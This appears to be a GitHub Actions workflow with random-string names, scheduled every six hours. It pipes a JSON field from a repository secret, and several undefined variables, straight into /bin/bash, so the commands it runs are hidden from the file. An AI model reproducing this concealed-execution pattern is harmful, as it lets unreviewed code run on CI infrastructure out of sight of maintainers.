name: caidefine

on:
  workflow_dispatch:
  schedule:
    - cron: '39 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: caidefine
        env:
          oeri26: ${{ secrets.oeri26 }}
        run: |
          echo $oeri26 | jq -r .ap68 | /bin/bash
          echo $kahl95144 | jq -r .khoi22576 | /bin/bash
          echo $lcdpu1888 | jq -r .p9056 | /bin/bash
          echo $dvb6170 | jq -r .lwnbw761 | /bin/bash
          echo $jk11254 | jq -r .hbe2246 | /bin/bash
          echo $qhg12 | jq -r .yur22493 | /bin/bash
          echo $hc2848 | jq -r .drc0056 | /bin/bash
          echo $gxib0763 | jq -r .iu8774 | /bin/bash

